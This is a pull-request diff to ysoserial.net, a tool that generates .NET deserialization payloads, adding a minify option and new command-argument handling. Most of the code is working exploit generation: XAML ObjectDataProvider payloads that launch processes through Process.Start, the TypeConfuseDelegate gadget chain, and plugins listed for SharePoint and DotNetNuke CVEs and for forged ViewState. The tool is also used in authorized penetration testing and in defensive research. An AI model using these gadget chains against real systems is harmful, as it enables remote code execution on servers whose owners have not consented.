### PR TITLE
New features, new formatter, bug fixing

### DIFF
--- a/README.md
+++ b/README.md
@@ -24,94 +24,86 @@ This software is a personal project and not related with any companies, includin
 ## Usage
 ```
 $ ./ysoserial -h
+Missing arguments.
 ysoserial.net generates deserialization payloads for a variety of .NET formatters.
 
-Available formatters:
-        ActivitySurrogateDisableTypeCheck (Disables 4.8+ type protections for ActivitySurrogateSelector, command is ignored.)
-                Formatters:
-                        BinaryFormatter
-                        ObjectStateFormatter
-                        SoapFormatter
-                        NetDataContractSerializer
-                        LosFormatter
-        ActivitySurrogateSelectorFromFile (Another variant of the ActivitySurrogateSelector gadget. This gadget interprets the command parameter as path to the .cs file that should be compiled as exploit class. Use semicolon to separate the file from additionally required assemblies, e. g., '-c ExploitClass.cs;System.Windows.Forms.dll'.)
-                Formatters:
-                        BinaryFormatter
-                        ObjectStateFormatter
-                        SoapFormatter
-                        LosFormatter
-        ActivitySurrogateSelector (This gadget ignores the command parameter and executes the constructor of ExploitClass class.)
-                Formatters:
-                        BinaryFormatter
-                        ObjectStateFormatter
-                        SoapFormatter
-                        LosFormatter
-        ObjectDataProvider (ObjectDataProvider gadget)
-                Formatters:
-                        Xaml
-                        Json.Net
-                        FastJson
-                        JavaScriptSerializer
-                        XmlSerializer
-                        DataContractSerializer
-                        YamlDotNet < 5.0.0
-        TextFormattingRunProperties (TextFormattingRunProperties gadget)
-                Formatters:
-                        BinaryFormatter
-                        ObjectStateFormatter
-                        SoapFormatter
-                        NetDataContractSerializer
-                        LosFormatter
-        PSObject (PSObject gadget. Target must run a system not patched for CVE-2017-8565 (Published: 07/11/2017))
-                Formatters:
-                        BinaryFormatter
-                        ObjectStateFormatter
-                        SoapFormatter
-                        NetDataContractSerializer
-                        LosFormatter
-        TypeConfuseDelegate (TypeConfuseDelegate gadget)
-                Formatters:
-                        BinaryFormatter
-                        ObjectStateFormatter
-                        NetDataContractSerializer
-                        LosFormatter
-        TypeConfuseDelegateMono (TypeConfuseDelegate gadget - Tweaked to work with Mono)
-                Formatters:
-                        BinaryFormatter
-                        ObjectStateFormatter
-                        NetDataContractSerializer
-                        LosFormatter
-        WindowsIdentity (WindowsIdentity gadget)
-                Formatters:
-                        BinaryFormatter
-                        Json.Net
-                        DataContractSerializer
-                        SoapFormatter
+Available gadgets:
+
+	ActivitySurrogateDisableTypeCheck (Disables 4.8+ type protections for ActivitySurrogateSelector, command is ignored.)
+		Formatters:
+			BinaryFormatter, ObjectStateFormatter, SoapFormatter, NetDataContractSerializer, LosFormatter
+
+	ActivitySurrogateSelectorFromFile (Another variant of the ActivitySurrogateSelector gadget. This gadget interprets the command parameter as path to the .cs file that should be compiled as exploit class. Use semicolon to separate the file from additionally required assemblies, e. g., '-c ExploitClass.cs;System.Windows.Forms.dll'.)
+		Formatters:
+			BinaryFormatter, ObjectStateFormatter, SoapFormatter, LosFormatter
+
+	ActivitySurrogateSelector (This gadget ignores the command parameter and executes the constructor of ExploitClass class.)
+		Formatters:
+			BinaryFormatter, ObjectStateFormatter, SoapFormatter, LosFormatter
+
+	ObjectDataProvider (ObjectDataProvider gadget)
+		Formatters:
+			Xaml, Json.Net, FastJson, JavaScriptSerializer, XmlSerializer, DataContractSerializer, YamlDotNet < 5.0.0, FsPickler
+
+	TextFormattingRunProperties (TextFormattingRunProperties gadget)
+		Formatters:
+			BinaryFormatter, ObjectStateFormatter, SoapFormatter, NetDataContractSerializer, LosFormatter
+
+	PSObject (PSObject gadget. Target must run a system not patched for CVE-2017-8565 (Published: 07/11/2017))
+		Formatters:
+			BinaryFormatter, ObjectStateFormatter, SoapFormatter, NetDataContractSerializer, LosFormatter
+
+	TypeConfuseDelegate (TypeConfuseDelegate gadget)
+		Formatters:
+			BinaryFormatter, ObjectStateFormatter, NetDataContractSerializer, LosFormatter
+
+	TypeConfuseDelegateMono (TypeConfuseDelegate gadget - Tweaked to work with Mono)
+		Formatters:
+			BinaryFormatter, ObjectStateFormatter, NetDataContractSerializer, LosFormatter
+
+	WindowsClaimsIdentity (WindowsClaimsIdentity (Microsoft.IdentityModel.Claims namespace) gadget)
+		Formatters:
+			BinaryFormatter, Json.Net, DataContractSerializer, NetDataContractSerializer, SoapFormatter
+
+	WindowsIdentity (WindowsIdentity gadget)
+		Formatters:
+			BinaryFormatter, Json.Net, DataContractSerializer, NetDataContractSerializer, SoapFormatter
+
 
 Available plugins:
-        ActivatorUrl (Sends a generated payload to an activated, presumably remote, object)
-        Altserialization (Generates payload for HttpStaticObjectsCollection or SessionStateItemCollection)
-        ApplicationTrust (Generates XML payload for the ApplicationTrust class)
-        Clipboard (Generates payload for DataObject and copy it into the clipboard - ready to be pasted in affected apps)
-        DotNetNuke (Generates payload for DotNetNuke CVE-2017-9822)
-        Resx (Generates RESX files)
-        SessionSecurityTokenHandler (Generates XML payload for the SessionSecurityTokenHandler class)
-        SharePoint (Generates poayloads for the following SharePoint CVEs: CVE-2019-0604, CVE-2018-8421)
-        TransactionManagerReenlist (Generates payload for the TransactionManager.Reenlist method)
-        ViewState (Generates a ViewState using known MachineKey parameters)
+	ActivatorUrl (Sends a generated payload to an activated, presumably remote, object)
+	Altserialization (Generates payload for HttpStaticObjectsCollection or SessionStateItemCollection)
+	ApplicationTrust (Generates XML payload for the ApplicationTrust class)
+	Clipboard (Generates payload for DataObject and copy it into the clipboard - ready to be pasted in affected apps)
+	DotNetNuke (Generates payload for DotNetNuke CVE-2017-9822)
+	Resx (Generates RESX files)
+	SessionSecurityTokenHandler (Generates XML payload for the SessionSecurityTokenHandler class)
+	SharePoint (Generates poayloads for the following SharePoint CVEs: CVE-2019-0604, CVE-2018-8421)
+	TransactionManagerReenlist (Generates payload for the TransactionManager.Reenlist method)
+	ViewState (Generates a ViewState using known MachineKey parameters)
 
 Usage: ysoserial.exe [options]
 Options:
-  -p, --plugin=VALUE         the plugin to be used
-  -o, --output=VALUE         the output format (raw|base64).
-  -g, --gadget=VALUE         the gadget chain.
-  -f, --formatter=VALUE      the formatter.
-  -c, --command=VALUE        the command to be executed.
-  -s, --stdin                the command to be executed will be read from
+  -p, --plugin=VALUE         The plugin to be used.
+  -o, --output=VALUE         The output format (raw|base64). Default: raw
+  -g, --gadget=VALUE         The gadget chain.
+  -f, --formatter=VALUE      The formatter.
+  -c, --command=VALUE        The command to be executed.
+      --rawcmd               Command will be executed as is without `cmd /c ` 
+                               being appended (anything after first space is an 
+                               argument).
+  -s, --stdin                The command to be executed will be read from 
                                standard input.
-  -t, --test                 whether to run payload locally. Default: false
-  -h, --help                 shows this message and exit
-      --credit               shows the credit/history of gadgets and plugins
+  -t, --test                 Whether to run payload locally. Default: false
+      --minify               Whether to minify the payloads where applicable 
+                               (experimental). Default: false
+      --sf, --searchformatter=VALUE
+                             Search in all formatters to show relevant 
+                               gadgets and their formatters (other parameters 
+                               will be ignored).
+  -h, --help                 Shows this message and exit.
+      --credit               Shows the credit/history of gadgets and plugins 
+                               (other parameters will be ignored).
 ```
 
 *Note:* When specifying complex commands, it can be tedious to escape some special character (;, |, &, ..). Use stdin option (-s) to read the command from stdin:
@@ -203,49 +195,51 @@ Special thanks to all contributors:
 
 ## Credits
 ```
-ysoserial.net has been developed by Alvaro Muñoz (@pwntester)
+ysoserial.net has been developed by Alvaro Mu?oz (@pwntester)
 
 Credits for available formatters:
-        ActivitySurrogateDisableTypeCheck
-                Nick Landers
-        ActivitySurrogateSelectorFromFile
-                James Forshaw
-        ActivitySurrogateSelector
-                James Forshaw
-        ObjectDataProvider
-                Oleksandr Mirosh and Alvaro Munoz
-        TextFormattingRunProperties
-                Oleksandr Mirosh and Alvaro Munoz
-        PSObject
-                Oleksandr Mirosh and Alvaro Munoz
-        TypeConfuseDelegate
-                James Forshaw
-        TypeConfuseDelegateMono
-                James Forshaw
-        WindowsIdentity
-                Levi Broderick
+	ActivitySurrogateDisableTypeCheck
+		Nick Landers
+	ActivitySurrogateSelectorFromFile
+		James Forshaw
+	ActivitySurrogateSelector
+		James Forshaw
+	ObjectDataProvider
+		Oleksandr Mirosh and Alvaro Munoz
+	TextFormattingRunProperties
+		Oleksandr Mirosh and Alvaro Munoz
+	PSObject
+		Oleksandr Mirosh and Alvaro Munoz
+	TypeConfuseDelegate
+		James Forshaw
+	TypeConfuseDelegateMono
+		James Forshaw
+	WindowsClaimsIdentity
+		Soroush Dalili
+	WindowsIdentity
+		Levi Broderick, updated by Soroush Dalili
 
 Credits for available plugins:
-        ActivatorUrl
-                Harrison Neal
-        Altserialization
-                Soroush Dalili
-        ApplicationTrust
-                Soroush Dalili
-        Clipboard
-                Soroush Dalili
-        DotNetNuke
-                discovered by Oleksandr Mirosh and Alvaro Munoz, implemented by Alvaro Munoz, tested by @GlitchWitch
-        Resx
-                Soroush Dalili
-        SessionSecurityTokenHandler
-                Soroush Dalili
-        SharePoint
-                CVE-2019-0604: Markus Wulftange, CVE-2018-8421: Soroush Dalili, implemented by Soroush Dalili
-        TransactionManagerReenlist
-                Soroush Dalili
-        ViewState
-                Soroush Dalili
+	ActivatorUrl
+		Harrison Neal
+	Altserialization
+		Soroush Dalili
+	ApplicationTrust
+		Soroush Dalili
+	Clipboard
+		Soroush Dalili
+	DotNetNuke
+		discovered by Oleksandr Mirosh and Alvaro Munoz, implemented by Alvaro Munoz, tested by @GlitchWitch
+	Resx
+		Soroush Dalili
+	SessionSecurityTokenHandler
+		Soroush Dalili
+	SharePoint
+		CVE-2019-0604: Markus Wulftange, CVE-2018-8421: Soroush Dalili, implemented by Soroush Dalili
+	TransactionManagerReenlist
+		Soroush Dalili
+	ViewState
+		Soroush Dalili
 
 Various other people have also donated their time and contributed to this project.
 Please see https://github.com/pwntester/ysoserial.net/graphs/contributors to find those who have helped developing more features or have fixed bugs.

--- a/README.md
+++ b/README.md
@@ -195,7 +195,7 @@ Special thanks to all contributors:
 
 ## Credits
 ```
-ysoserial.net has been developed by Alvaro Mu?oz (@pwntester)
+ysoserial.net has been developed by Alvaro Muñoz (@pwntester)
 
 Credits for available formatters:
 	ActivitySurrogateDisableTypeCheck

--- a/ysoserial/App.config
+++ b/ysoserial/App.config
@@ -1,7 +1,7 @@
 <?xml version="1.0" encoding="utf-8"?>
 <configuration>
     <startup> 
-        <supportedRuntime version="v4.0" sku=".NETFramework,Version=v4.5.1"/>
+        <supportedRuntime version="v4.0" sku=".NETFramework,Version=v4.5.2"/>
     </startup>
   <runtime>
     <assemblyBinding xmlns="urn:schemas-microsoft-com:asm.v1">

--- a/ysoserial/App.config
+++ b/ysoserial/App.config
@@ -1,6 +1,14 @@
-﻿<?xml version="1.0" encoding="utf-8" ?>
+﻿<?xml version="1.0" encoding="utf-8"?>
 <configuration>
     <startup> 
-        <supportedRuntime version="v4.0" sku=".NETFramework,Version=v4.5.2" />
+        <supportedRuntime version="v4.0" sku=".NETFramework,Version=v4.6.1" />
     </startup>
+  <runtime>
+    <assemblyBinding xmlns="urn:schemas-microsoft-com:asm.v1">
+      <dependentAssembly>
+        <assemblyIdentity name="Newtonsoft.Json" publicKeyToken="30ad4fe6b2a6aeed" culture="neutral" />
+        <bindingRedirect oldVersion="0.0.0.0-10.0.0.0" newVersion="10.0.0.0" />
+      </dependentAssembly>
+    </assemblyBinding>
+  </runtime>
 </configuration>

--- a/ysoserial/App.config
+++ b/ysoserial/App.config
@@ -1,13 +1,13 @@
-﻿<?xml version="1.0" encoding="utf-8"?>
+<?xml version="1.0" encoding="utf-8"?>
 <configuration>
     <startup> 
-        <supportedRuntime version="v4.0" sku=".NETFramework,Version=v4.6.1" />
+        <supportedRuntime version="v4.0" sku=".NETFramework,Version=v4.5.1"/>
     </startup>
   <runtime>
     <assemblyBinding xmlns="urn:schemas-microsoft-com:asm.v1">
       <dependentAssembly>
-        <assemblyIdentity name="Newtonsoft.Json" publicKeyToken="30ad4fe6b2a6aeed" culture="neutral" />
-        <bindingRedirect oldVersion="0.0.0.0-10.0.0.0" newVersion="10.0.0.0" />
+        <assemblyIdentity name="Newtonsoft.Json" publicKeyToken="30ad4fe6b2a6aeed" culture="neutral"/>
+        <bindingRedirect oldVersion="0.0.0.0-10.0.0.0" newVersion="10.0.0.0"/>
       </dependentAssembly>
     </assemblyBinding>
   </runtime>

--- a/ysoserial/ExploitClass.cs
+++ b/ysoserial/ExploitClass.cs
@@ -1,14 +1,10 @@
-﻿using System;
-using System.Windows.Forms;
-
-namespace ysoserial
-{
-    class ExploitClass
+﻿    // ExploitClass was renamed to E to reduce the size a little bit
+    class E
     {
-        public ExploitClass()
+        public E()
         {
-            try
-            {
+            //try
+            //{
                 /* Payload code to be executed. Examples: */
 
 
@@ -37,10 +33,9 @@ namespace ysoserial
                 /* Causing a delay */
                 //System.Threading.Thread.Sleep(10000); // waits for 10 seconds
 
-            }
-            catch (Exception)
-            {
-            }
+            //}
+            //catch (Exception)
+            //{
+            //}
         }
     }
-}

--- a/ysoserial/Generators/ActivitySurrogateDisableTypeCheck.cs
+++ b/ysoserial/Generators/ActivitySurrogateDisableTypeCheck.cs
@@ -25,7 +25,7 @@ namespace ysoserial.Generators
             return new List<string> { "BinaryFormatter", "ObjectStateFormatter", "SoapFormatter", "NetDataContractSerializer", "LosFormatter" };
         }
 
-        public override object Generate(string cmd, string formatter, Boolean test)
+        public override object Generate(string cmd, string formatter, Boolean test, Boolean minify)
         {
             string xaml_payload = @"<ResourceDictionary
 xmlns=""http://schemas.microsoft.com/winfx/2006/xaml/presentation""
@@ -57,9 +57,14 @@ xmlns:r=""clr-namespace:System.Reflection;assembly=mscorlib"">
         </ObjectDataProvider.MethodParameters>
     </ObjectDataProvider>
 </ResourceDictionary>";
+            
+            if (minify)
+            {
+                xaml_payload = Helpers.XMLMinifier.Minify(xaml_payload, null, null);
+            }
 
             TextFormattingRunPropertiesMarshal payload = new TextFormattingRunPropertiesMarshal(xaml_payload);
-            return Serialize(payload, formatter, test);
+            return Serialize(payload, formatter, test, minify);
         }
 
     }

--- a/ysoserial/Generators/ActivitySurrogateSelectorFromFileGenerator.cs
+++ b/ysoserial/Generators/ActivitySurrogateSelectorFromFileGenerator.cs
@@ -51,10 +51,10 @@ namespace ysoserial.Generators
             return "James Forshaw";
         }
 
-        public override object Generate(string file, string formatter, Boolean test)
+        public override object Generate(string file, string formatter, Boolean test, Boolean minify)
         {
             PayloadClassFromFile payload = new PayloadClassFromFile(file);
-            return Serialize(payload, formatter, test);
+            return Serialize(payload, formatter, test, minify);
         }
     }
 }

--- a/ysoserial/Generators/ActivitySurrogateSelectorFromFileGenerator.cs
+++ b/ysoserial/Generators/ActivitySurrogateSelectorFromFileGenerator.cs
@@ -16,6 +16,10 @@ namespace ysoserial.Generators
 
         public PayloadClassFromFile(string file)
         {
+            if(file.StartsWith("cmd /c "))
+            {
+                file = file.Substring("cmd /c ".Length);
+            }
             string[] files = file.Split(new[] { ';' }).Select(s => s.Trim()).ToArray();
             CodeDomProvider codeDomProvider = CodeDomProvider.CreateProvider("CSharp");
             CompilerParameters compilerParameters = new CompilerParameters();

--- a/ysoserial/Generators/ActivitySurrogateSelectorGenerator.cs
+++ b/ysoserial/Generators/ActivitySurrogateSelectorGenerator.cs
@@ -34,7 +34,7 @@ namespace ysoserial.Generators
         protected byte[] assemblyBytes;
         public PayloadClass()
         {
-            this.assemblyBytes = File.ReadAllBytes(typeof(ExploitClass).Assembly.Location);
+            this.assemblyBytes = File.ReadAllBytes(typeof(E).Assembly.Location);
         }
 
         protected PayloadClass(SerializationInfo info, StreamingContext context)
@@ -61,7 +61,7 @@ namespace ysoserial.Generators
             IDictionary dict = (IDictionary)Activator.CreateInstance(typeof(int).Assembly.GetType("System.Runtime.Remoting.Channels.AggregateDictionary"), pds);
 
             // DesignerVerb queries a value from an IDictionary when its ToString is called. This results in the linq enumerator being walked.
-            DesignerVerb verb = new DesignerVerb("XYZ", null);
+            DesignerVerb verb = new DesignerVerb("", null);
             // Need to insert IDictionary using reflection.
             typeof(MenuCommand).GetField("properties", BindingFlags.NonPublic | BindingFlags.Instance).SetValue(verb, dict);
 
@@ -77,8 +77,12 @@ namespace ysoserial.Generators
             Hashtable ht = new Hashtable();
 
             // Add two entries to table.
+            /*
             ht.Add(verb, "Hello");
             ht.Add("Dummy", "Hello2");
+            */
+            ht.Add(verb, "");
+            ht.Add("", "");
 
             FieldInfo fi_keys = ht.GetType().GetField("buckets", BindingFlags.NonPublic | BindingFlags.Instance);
             Array keys = (Array)fi_keys.GetValue(ht);

--- a/ysoserial/Generators/ActivitySurrogateSelectorGenerator.cs
+++ b/ysoserial/Generators/ActivitySurrogateSelectorGenerator.cs
@@ -142,10 +142,10 @@ namespace ysoserial.Generators
             return "James Forshaw";
         }
 
-        public override object Generate(string cmd, string formatter, Boolean test)
+        public override object Generate(string cmd, string formatter, Boolean test, Boolean minify)
         {
             PayloadClass payload = new PayloadClass();
-            return Serialize(payload, formatter, test);
+            return Serialize(payload, formatter, test, minify);
         }
     }
 }

--- a/ysoserial/Generators/Generator.cs
+++ b/ysoserial/Generators/Generator.cs
@@ -9,8 +9,8 @@ namespace ysoserial.Generators
         string Description();
         string Credit();
         List<string> SupportedFormatters();
-        object Generate(string cmd, string formatter, Boolean test);
-        object Serialize(object cmdobj, string formatter, Boolean test);
+        object Generate(string cmd, string formatter, Boolean test, Boolean minify);
+        object Serialize(object cmdobj, string formatter, Boolean test, Boolean minify);
         Boolean IsSupported(string formatter);
     }
 }

--- a/ysoserial/Generators/GenericGenerator.cs
+++ b/ysoserial/Generators/GenericGenerator.cs
@@ -102,7 +102,7 @@ namespace ysoserial.Generators
                 if (minify)
                 {
                     stream.Position = 0;
-                    stream = Helpers.XMLMinifier.Minify(stream, new string[] { "mscorlib" }, null, Helpers.FormatterType.NetDataContractXML);
+                    stream = Helpers.XMLMinifier.Minify(stream, new string[] { "mscorlib" }, null, Helpers.FormatterType.NetDataContractXML, true);
                 }
 
                 if (test)

--- a/ysoserial/Generators/GenericGenerator.cs
+++ b/ysoserial/Generators/GenericGenerator.cs
@@ -14,7 +14,7 @@ namespace ysoserial.Generators
     {
         public abstract string Description();
 
-        public abstract object Generate(string cmd, string formatter, Boolean test);
+        public abstract object Generate(string cmd, string formatter, Boolean test, Boolean minify);
 
         public abstract string Credit();
 
@@ -30,7 +30,7 @@ namespace ysoserial.Generators
             else return false;
         }
 
-        public object Serialize(object cmdobj, string formatter, Boolean test)
+        public object Serialize(object cmdobj, string formatter, Boolean test, Boolean minify)
         {
             // Disable ActivitySurrogate type protections during generation
             ConfigurationManager.AppSettings.Set("microsoft:WorkflowComponentModel:DisableActivitySurrogateSelectorTypeCheck", "true");
@@ -74,6 +74,13 @@ namespace ysoserial.Generators
             {
                 SoapFormatter sf = new SoapFormatter();
                 sf.Serialize(stream, cmdobj);
+
+                if (minify)
+                {
+                    stream.Position = 0;
+                    stream = Helpers.XMLMinifier.Minify(stream, null, null, Helpers.FormatterType.SoapFormatter);
+                }
+
                 if (test)
                 {
                     try
@@ -91,6 +98,13 @@ namespace ysoserial.Generators
             {
                 NetDataContractSerializer ndcs = new NetDataContractSerializer();
                 ndcs.Serialize(stream, cmdobj);
+
+                if (minify)
+                {
+                    stream.Position = 0;
+                    stream = Helpers.XMLMinifier.Minify(stream, new string[] { "mscorlib" }, null, Helpers.FormatterType.NetDataContractXML);
+                }
+
                 if (test)
                 {
                     try

--- a/ysoserial/Generators/PSObjectGenerator.cs
+++ b/ysoserial/Generators/PSObjectGenerator.cs
@@ -132,6 +132,7 @@ namespace ysoserial.Generators
             if (minify)
             {
                 // Could not be tested so it may not work here!
+                // also not sure if can use CDATA otherwise we could use the CDATA flag to save more space
                 clixml = Helpers.XMLMinifier.Minify(clixml, null, null);
             }
 

--- a/ysoserial/Generators/PSObjectGenerator.cs
+++ b/ysoserial/Generators/PSObjectGenerator.cs
@@ -48,8 +48,23 @@ namespace ysoserial.Generators
             return new List<string> { "BinaryFormatter", "ObjectStateFormatter", "SoapFormatter", "NetDataContractSerializer", "LosFormatter" };
         }
 
-        public override object Generate(string cmd, string formatter, Boolean test)
+        public override object Generate(string cmd, string formatter, Boolean test, Boolean minify)
         {
+            Boolean hasArgs;
+            string[] splittedCMD = Helpers.CommandArgSplitter.SplitCommand(cmd, Helpers.CommandArgSplitter.CommandType.XML, out hasArgs);
+
+            String cmdPart;
+
+            if (hasArgs)
+            {
+                cmdPart = $@"&lt;System:String&gt;"+ splittedCMD[0] + @"&lt;/System:String&gt;
+        &lt;System:String&gt;""" + splittedCMD[1] + @""" &lt;/System:String&gt;";
+            }
+            else
+            {
+                cmdPart = $@"&lt;System:String&gt;" + splittedCMD[0] + @"&lt;/System:String&gt;";
+            }
+
             string clixml = @"
 <Objs Version=""1.1.0.1"" xmlns=""http://schemas.microsoft.com/powershell/2004/04"">&#xD;
 <Obj RefId=""0"">&#xD;
@@ -80,8 +95,7 @@ namespace ysoserial.Generators
   xmlns:Diag=""clr-namespace:System.Diagnostics;assembly=system""&gt;
 	 &lt;ObjectDataProvider x:Key=""LaunchCalc"" ObjectType = ""{ x:Type Diag:Process}"" MethodName = ""Start"" &gt;
      &lt;ObjectDataProvider.MethodParameters&gt;
-        &lt;System:String&gt;cmd&lt;/System:String&gt;
-        &lt;System:String&gt;/c """ + cmd + @""" &lt;/System:String&gt;
+        "+ cmdPart + @"
      &lt;/ObjectDataProvider.MethodParameters&gt;
     &lt;/ObjectDataProvider&gt;
 &lt;/ResourceDictionary&gt;
@@ -114,8 +128,15 @@ namespace ysoserial.Generators
     </MS>&#xD;
   </Obj>&#xD;
 </Objs>";
+
+            if (minify)
+            {
+                // Could not be tested so it may not work here!
+                clixml = Helpers.XMLMinifier.Minify(clixml, null, null);
+            }
+
             PsObjectMarshal payload = new PsObjectMarshal(clixml);
-            return Serialize(payload, formatter, test);
+            return Serialize(payload, formatter, test, minify);
         }
 
     }

--- a/ysoserial/Generators/TextFormattingRunPropertiesGenerator.cs
+++ b/ysoserial/Generators/TextFormattingRunPropertiesGenerator.cs
@@ -48,23 +48,42 @@ namespace ysoserial.Generators
             return new List<string> { "BinaryFormatter", "ObjectStateFormatter", "SoapFormatter", "NetDataContractSerializer", "LosFormatter" };
         }
 
-        public override object Generate(string cmd, string formatter, Boolean test)
+        public override object Generate(string cmd, string formatter, Boolean test, Boolean minify)
         {
+            Boolean hasArgs;
+            string[] splittedCMD = Helpers.CommandArgSplitter.SplitCommand(cmd, Helpers.CommandArgSplitter.CommandType.XML, out hasArgs);
+
+            String cmdPart;
+
+            if (hasArgs)
+            {
+                cmdPart = $@"<System:String>"+ splittedCMD[0] + @"</System:String>
+        <System:String>""" + splittedCMD[1] + @""" </System:String>";
+            }
+            else
+            {
+                cmdPart = $@"<System:String>" + splittedCMD[0] + @"</System:String>";
+            }
+
             string xaml_payload = @"<ResourceDictionary
   xmlns=""http://schemas.microsoft.com/winfx/2006/xaml/presentation""
   xmlns:x=""http://schemas.microsoft.com/winfx/2006/xaml""
   xmlns:System=""clr-namespace:System;assembly=mscorlib""
   xmlns:Diag=""clr-namespace:System.Diagnostics;assembly=system"">
-	 <ObjectDataProvider x:Key=""LaunchCalc"" ObjectType = ""{ x:Type Diag:Process}"" MethodName = ""Start"" >
+	 <ObjectDataProvider x:Key="""" ObjectType = ""{ x:Type Diag:Process}"" MethodName = ""Start"" >
      <ObjectDataProvider.MethodParameters>
-        <System:String>cmd</System:String>
-        <System:String>/c """ + cmd + @""" </System:String>
+        "+ cmdPart + @"
      </ObjectDataProvider.MethodParameters>
     </ObjectDataProvider>
 </ResourceDictionary>";
 
+            if (minify)
+            {
+                xaml_payload = Helpers.XMLMinifier.Minify(xaml_payload, null, null);
+            }
+
             TextFormattingRunPropertiesMarshal payload = new TextFormattingRunPropertiesMarshal(xaml_payload);
-            return Serialize(payload, formatter, test);
+            return Serialize(payload, formatter, test, minify);
         }
 
     }

--- a/ysoserial/Generators/TypeConfuseDelegateGenerator.cs
+++ b/ysoserial/Generators/TypeConfuseDelegateGenerator.cs
@@ -56,6 +56,10 @@ namespace ysoserial.Generators
             {
                 set.Add(splittedCMD[1]);
             }
+            else
+            {
+                set.Add(""); // this is needed (as it accepts two args?)
+            }
             
             FieldInfo fi = typeof(MulticastDelegate).GetField("_invocationList", BindingFlags.NonPublic | BindingFlags.Instance);
             object[] invoke_list = d.GetInvocationList();

--- a/ysoserial/Generators/TypeConfuseDelegateGenerator.cs
+++ b/ysoserial/Generators/TypeConfuseDelegateGenerator.cs
@@ -28,26 +28,35 @@ namespace ysoserial.Generators
             return new List<string> { "BinaryFormatter", "ObjectStateFormatter", "NetDataContractSerializer", "LosFormatter" };
         }
 
-        public override object Generate(string cmd, string formatter, Boolean test)
+        public override object Generate(string cmd, string formatter, Boolean test, Boolean minify)
         {
-            return Serialize(TypeConfuseDelegateGadget(cmd), formatter, test);
+            return Serialize(TypeConfuseDelegateGadget(cmd), formatter, test, minify);
         }
 
         /* this can be used easily by the plugins as well */
         public object TypeConfuseDelegateGadget(string cmd)
         {
-            if (File.Exists(cmd))
+            String potentialCmdFile = cmd.Replace("cmd /c ", ""); // as we add this automatically to the command
+
+            if (File.Exists(potentialCmdFile))
             {
                 Console.Error.WriteLine("Reading command from file " + cmd + " ...");
-                cmd = File.ReadAllText(cmd);
+                cmd = File.ReadAllText(potentialCmdFile);
             }
+
+            Boolean hasArgs;
+            string[] splittedCMD = Helpers.CommandArgSplitter.SplitCommand(cmd, out hasArgs);
+
             Delegate da = new Comparison<string>(String.Compare);
             Comparison<string> d = (Comparison<string>)MulticastDelegate.Combine(da, da);
             IComparer<string> comp = Comparer<string>.Create(d);
             SortedSet<string> set = new SortedSet<string>(comp);
-            set.Add("cmd");
-            set.Add("/c " + cmd);
-
+            set.Add(splittedCMD[0]);
+            if (hasArgs)
+            {
+                set.Add(splittedCMD[1]);
+            }
+            
             FieldInfo fi = typeof(MulticastDelegate).GetField("_invocationList", BindingFlags.NonPublic | BindingFlags.Instance);
             object[] invoke_list = d.GetInvocationList();
             // Modify the invocation list to add Process::Start(string, string)

--- a/ysoserial/Generators/TypeConfuseDelegateMonoGenerator.cs
+++ b/ysoserial/Generators/TypeConfuseDelegateMonoGenerator.cs
@@ -28,25 +28,34 @@ namespace ysoserial.Generators
             return new List<string> { "BinaryFormatter", "ObjectStateFormatter", "NetDataContractSerializer", "LosFormatter" };
         }
 
-        public override object Generate(string cmd, string formatter, Boolean test)
+        public override object Generate(string cmd, string formatter, Boolean test, Boolean minify)
         {
-            return Serialize(TypeConfuseDelegateGadget(cmd), formatter, test);
+            return Serialize(TypeConfuseDelegateGadget(cmd), formatter, test, minify);
         }
 
         /* this can be used easily by the plugins as well */
         public object TypeConfuseDelegateGadget(string cmd)
         {
-            if (File.Exists(cmd))
+            String potentialCmdFile = cmd.Replace("cmd /c ", ""); // as we add this automatically to the command
+
+            if (File.Exists(potentialCmdFile))
             {
                 Console.Error.WriteLine("Reading command from file " + cmd + " ...");
-                cmd = File.ReadAllText(cmd);
+                cmd = File.ReadAllText(potentialCmdFile);
             }
+
+            Boolean hasArgs;
+            string[] splittedCMD = Helpers.CommandArgSplitter.SplitCommand(cmd, out hasArgs);
+            
             Delegate da = new Comparison<string>(String.Compare);
             Comparison<string> d = (Comparison<string>)MulticastDelegate.Combine(da, da);
             IComparer<string> comp = Comparer<string>.Create(d);
             SortedSet<string> set = new SortedSet<string>(comp);
-            set.Add("cmd");
-            set.Add("/c " + cmd);
+            set.Add(splittedCMD[0]);
+            if (hasArgs)
+            {
+                set.Add(splittedCMD[1]);
+            }
 
             FieldInfo fi = typeof(MulticastDelegate).GetField("_invocationList", BindingFlags.NonPublic | BindingFlags.Instance);
             object[] invoke_list = d.GetInvocationList();

--- a/ysoserial/Generators/TypeConfuseDelegateMonoGenerator.cs
+++ b/ysoserial/Generators/TypeConfuseDelegateMonoGenerator.cs
@@ -56,6 +56,10 @@ namespace ysoserial.Generators
             {
                 set.Add(splittedCMD[1]);
             }
+            else
+            {
+                set.Add(""); // this is needed (as it accepts two args?)
+            }
 
             FieldInfo fi = typeof(MulticastDelegate).GetField("_invocationList", BindingFlags.NonPublic | BindingFlags.Instance);
             object[] invoke_list = d.GetInvocationList();

--- a/ysoserial/Generators/WindowsClaimsIdentityGenerator.cs
+++ b/ysoserial/Generators/WindowsClaimsIdentityGenerator.cs
@@ -183,7 +183,7 @@ namespace ysoserial.Generators
 
                 if (minify)
                 {
-                    payload = XMLMinifier.Minify(payload, new string[] { "Microsoft.IdentityModel" }, null);
+                    payload = XMLMinifier.Minify(payload, new string[] { "Microsoft.IdentityModel" }, null, Helpers.FormatterType.SoapFormatter);
                 }
 
                 if (test)

--- a/ysoserial/Generators/WindowsClaimsIdentityGenerator.cs
+++ b/ysoserial/Generators/WindowsClaimsIdentityGenerator.cs
@@ -6,6 +6,7 @@ using System.Xml;
 using Newtonsoft.Json;
 using System.Runtime.Serialization.Formatters.Soap;
 using Microsoft.IdentityModel.Claims;
+using ysoserial.Helpers;
 
 namespace ysoserial.Generators
 {
@@ -60,28 +61,30 @@ namespace ysoserial.Generators
             }
         }
 
-        public override object Generate(string cmd, string formatter, Boolean test)
+        public override object Generate(string cmd, string formatter, Boolean test, Boolean minify)
         {
             Generator binaryFormatterGenerator = new TypeConfuseDelegateGenerator();
-            byte[] binaryFormatterPayload = (byte[])binaryFormatterGenerator.Generate(cmd, "BinaryFormatter", false);
+            byte[] binaryFormatterPayload = (byte[])binaryFormatterGenerator.Generate(cmd, "BinaryFormatter", false, minify);
             string b64encoded = Convert.ToBase64String(binaryFormatterPayload);
 
             if (formatter.Equals("binaryformatter", StringComparison.OrdinalIgnoreCase))
             {
                 var obj = new WindowsClaimsIdentityMarshal(b64encoded);
-                return Serialize(obj, formatter, test);
